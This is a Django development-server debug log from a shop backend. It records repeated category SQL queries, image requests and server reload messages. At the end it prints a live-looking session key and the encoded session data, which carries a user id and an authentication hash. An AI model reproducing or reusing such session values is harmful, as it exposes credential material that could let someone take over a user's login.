"shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:55:21,895 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:55:21,900 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:55:21,904 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:55:21,908 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:55:21,913 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:55:21,917 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:55:21] "GET /api/v1/categories/ HTTP/1.0" 200 14733 [13/Dec/2019 13:55:22] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:22] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:22] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:22] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:22] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:22] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:22] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:22] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:22] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:23] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:24] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 13:55:24] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 [13/Dec/2019 13:58:45] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/shopapi/serializers.py changed, reloading. Performing system checks... December 13, 2019 - 13:49:54 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-13 14:00:05,219 utils 20136 140506701043456 (0.005) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-13 14:00:05,224 utils 20136 140506701043456 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-13 14:00:38,760 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:00:38,772 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:00:38,776 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:00:38,779 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:00:38,782 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:00:38,784 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:00:38,786 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:00:38,789 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:00:38,791 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:00:38,795 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:00:38,797 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:00:38,800 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:00:38,802 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:00:38,804 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:00:38,808 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:00:38,810 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:00:38,812 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:00:38,814 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:00:38,816 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:00:38,820 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:00:38,823 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:00:38,825 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:00:38,827 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:00:38,830 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:00:38,832 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:00:38,835 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:00:38,838 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:00:38,840 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:00:38,842 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:00:38,844 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:00:38,848 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:00:38,850 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:00:38,852 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:00:38,854 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:00:38,857 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:00:38,860 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:00:38,862 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:00:38,865 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:00:38,867 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:00:38,869 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:00:38,871 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:00:38,874 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:00:38,876 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:00:38,879 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:00:38,882 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:00:38,884 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-13 14:00:38,924 utils 20136 140506667599616 (0.002) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T14:00:38.920330+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 13, 14, 0, 38, 920330, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-13 14:00:39,048 utils 20136 140506667599616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T14:00:39.046403+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; 